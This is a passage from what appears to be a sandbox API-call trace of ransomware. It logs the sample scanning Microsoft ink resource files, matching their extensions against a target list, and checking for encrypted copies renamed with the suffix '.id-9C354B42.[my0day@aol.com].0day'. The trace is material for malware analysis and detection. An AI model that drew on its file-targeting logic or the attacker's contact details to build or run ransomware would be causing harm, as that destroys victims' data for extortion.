dwFlags=0x0, lpMem=0x587b20 | out: hHeap=0x4a0000) returned 1 [0265.358] Sleep (dwMilliseconds=0x64) [0265.563] Sleep (dwMilliseconds=0x64) [0265.773] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.773] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0265.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0265.835] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=3584) returned 1 [0265.835] CloseHandle (hObject=0x304) returned 1 [0265.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0265.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.837] lstrlenW (lpString=".doc") returned 4 [0265.838] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.838] lstrlenW (lpString=".docx") returned 5 [0265.838] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.838] lstrlenW (lpString=".pdf") returned 4 [0265.838] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.838] lstrlenW (lpString=".xls") returned 4 [0265.838] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.838] lstrlenW (lpString=".xlsx") returned 5 [0265.838] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.838] lstrlenW (lpString=".ppt") returned 4 [0265.838] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.838] lstrlenW (lpString=".zip") returned 4 [0265.838] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.838] lstrlenW (lpString=".rar") returned 4 [0265.838] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.838] lstrlenW (lpString=".bz2") returned 4 [0265.838] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.838] lstrlenW (lpString=".7z") returned 3 [0265.838] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.838] lstrlenW (lpString=".dbf") returned 4 [0265.838] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.838] lstrlenW (lpString=".1cd") returned 4 [0265.838] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.838] lstrlenW (lpString=".jpg") returned 4 [0265.838] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.838] lstrlenW (lpString=".doc") returned 4 [0265.838] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.838] lstrlenW (lpString=".docx") returned 5 [0265.838] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.839] lstrlenW (lpString=".pdf") returned 4 [0265.839] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.839] lstrlenW (lpString=".xls") returned 4 [0265.839] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.839] lstrlenW (lpString=".xlsx") returned 5 [0265.839] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.839] lstrlenW (lpString=".ppt") returned 4 [0265.839] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.839] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.839] lstrlenW (lpString=".zip") returned 4 [0265.839] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.839] lstrlenW (lpString=".rar") returned 4 [0265.839] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.839] lstrlenW (lpString=".bz2") returned 4 [0265.839] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.839] lstrlenW (lpString=".7z") returned 3 [0265.839] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.839] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.839] lstrlenW (lpString=".dbf") returned 4 [0265.839] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.839] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.839] lstrlenW (lpString=".1cd") returned 4 [0265.839] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.839] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0265.839] lstrlenW (lpString=".jpg") returned 4 [0265.839] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.839] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.839] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0265.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0265.937] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=4096) returned 1 [0265.938] CloseHandle (hObject=0x308) returned 1 [0265.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0265.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.938] lstrlenW (lpString=".doc") returned 4 [0265.938] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.938] lstrlenW (lpString=".docx") returned 5 [0265.938] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.938] lstrlenW (lpString=".pdf") returned 4 [0265.938] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.938] lstrlenW (lpString=".xls") returned 4 [0265.938] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.938] lstrlenW (lpString=".xlsx") returned 5 [0265.938] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.938] lstrlenW (lpString=".ppt") returned 4 [0265.938] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.938] lstrlenW (lpString=".zip") returned 4 [0265.938] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.938] lstrlenW (lpString=".rar") returned 4 [0265.938] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.938] lstrlenW (lpString=".bz2") returned 4 [0265.938] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.938] lstrlenW (lpString=".7z") returned 3 [0265.938] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.938] lstrlenW (lpString=".dbf") returned 4 [0265.938] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.938] lstrlenW (lpString=".1cd") returned 4 [0265.938] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.939] lstrlenW (lpString=".jpg") returned 4 [0265.939] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.939] lstrlenW (lpString=".doc") returned 4 [0265.939] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.939] lstrlenW (lpString=".docx") returned 5 [0265.939] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.939] lstrlenW (lpString=".pdf") returned 4 [0265.939] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.939] lstrlenW (lpString=".xls") returned 4 [0265.939] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.939] lstrlenW (lpString=".xlsx") returned 5 [0265.939] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.939] lstrlenW (lpString=".ppt") returned 4 [0265.939] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.939] lstrlenW (lpString=".zip") returned 4 [0265.939] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.939] lstrlenW (lpString=".rar") returned 4 [0265.939] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.939] lstrlenW (lpString=".bz2") returned 4 [0265.939] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.939] lstrlenW (lpString=".7z") returned 3 [0265.939] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.939] lstrlenW (lpString=".dbf") returned 4 [0265.939] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.939] lstrlenW (lpString=".1cd") returned 4 [0265.939] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0265.939] lstrlenW (lpString=".jpg") returned 4 [0265.940] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.940] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.940] lstrlenW (lpString="InkWatson.exe.mui") returned 17 [0265.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.173] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=9216) returned 1 [0266.173] CloseHandle (hObject=0x300) returned 1 [0266.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui")) returned 0x20 [0266.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.173] lstrlenW (lpString=".doc") returned 4 [0266.173] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.173] lstrlenW (lpString=".docx") returned 5 [0266.174] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.174] lstrlenW (lpString=".pdf") returned 4 [0266.174] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.174] lstrlenW (lpString=".xls") returned 4 [0266.174] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.174] lstrlenW (lpString=".xlsx") returned 5 [0266.174] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.174] lstrlenW (lpString=".ppt") returned 4 [0266.174] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.174] lstrlenW (lpString=".zip") returned 4 [0266.174] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.174] lstrlenW (lpString=".rar") returned 4 [0266.174] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.174] lstrlenW (lpString=".bz2") returned 4 [0266.174] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.174] lstrlenW (lpString=".7z") returned 3 [0266.174] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.174] lstrlenW (lpString=".dbf") returned 4 [0266.174] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.174] lstrlenW (lpString=".1cd") returned 4 [0266.174] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.174] lstrlenW (lpString=".jpg") returned 4 [0266.174] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.174] lstrlenW (lpString=".doc") returned 4 [0266.174] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.174] lstrlenW (lpString=".docx") returned 5 [0266.174] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.174] lstrlenW (lpString=".pdf") returned 4 [0266.174] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.174] lstrlenW (lpString=".xls") returned 4 [0266.175] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.175] lstrlenW (lpString=".xlsx") returned 5 [0266.175] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.175] lstrlenW (lpString=".ppt") returned 4 [0266.175] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.175] lstrlenW (lpString=".zip") returned 4 [0266.175] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.175] lstrlenW (lpString=".rar") returned 4 [0266.175] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.175] lstrlenW (lpString=".bz2") returned 4 [0266.175] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.175] lstrlenW (lpString=".7z") returned 3 [0266.175] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.175] lstrlenW (lpString=".dbf") returned 4 [0266.175] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.175] lstrlenW (lpString=".1cd") returned 4 [0266.175] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0266.175] lstrlenW (lpString=".jpg") returned 4 [0266.175] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.175] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0266.176] lstrlenW (lpString="mip.exe.mui") returned 11 [0266.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.176] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=10240) returned 1 [0266.176] CloseHandle (hObject=0x300) returned 1 [0266.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui")) returned 0x20 [0266.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.176] lstrlenW (lpString=".doc") returned 4 [0266.176] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.176] lstrlenW (lpString=".docx") returned 5 [0266.176] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.176] lstrlenW (lpString=".pdf") returned 4 [0266.176] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.176] lstrlenW (lpString=".xls") returned 4 [0266.176] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.176] lstrlenW (lpString=".xlsx") returned 5 [0266.176] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.176] lstrlenW (lpString=".ppt") returned 4 [0266.176] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.176] lstrlenW (lpString=".zip") returned 4 [0266.176] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.176] lstrlenW (lpString=".rar") returned 4 [0266.176] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.176] lstrlenW (lpString=".bz2") returned 4 [0266.176] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.177] lstrlenW (lpString=".7z") returned 3 [0266.177] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.177] lstrlenW (lpString=".dbf") returned 4 [0266.177] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.177] lstrlenW (lpString=".1cd") returned 4 [0266.177] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.177] lstrlenW (lpString=".jpg") returned 4 [0266.177] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.177] lstrlenW (lpString=".doc") returned 4 [0266.177] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.177] lstrlenW (lpString=".docx") returned 5 [0266.177] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.177] lstrlenW (lpString=".pdf") returned 4 [0266.177] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.177] lstrlenW (lpString=".xls") returned 4 [0266.177] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.177] lstrlenW (lpString=".xlsx") returned 5 [0266.177] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.177] lstrlenW (lpString=".ppt") returned 4 [0266.177] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.177] lstrlenW (lpString=".zip") returned 4 [0266.177] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.177] lstrlenW (lpString=".rar") returned 4 [0266.177] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.177] lstrlenW (lpString=".bz2") returned 4 [0266.177] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.177] lstrlenW (lpString=".7z") returned 3 [0266.177] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.177] lstrlenW (lpString=".dbf") returned 4 [0266.177] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.178] lstrlenW (lpString=".1cd") returned 4 [0266.178] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0266.178] lstrlenW (lpString=".jpg") returned 4 [0266.178] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.178] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0266.178] lstrlenW (lpString="mshwLatin.dll.mui") returned 17 [0266.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.179] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=2560) returned 1 [0266.179] CloseHandle (hObject=0x300) returned 1 [0266.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui")) returned 0x20 [0266.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.179] lstrlenW (lpString=".doc") returned 4 [0266.179] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.179] lstrlenW (lpString=".docx") returned 5 [0266.179] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.179] lstrlenW (lpString=".pdf") returned 4 [0266.179] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.179] lstrlenW (lpString=".xls") returned 4 [0266.179] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.179] lstrlenW (lpString=".xlsx") returned 5 [0266.179] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned 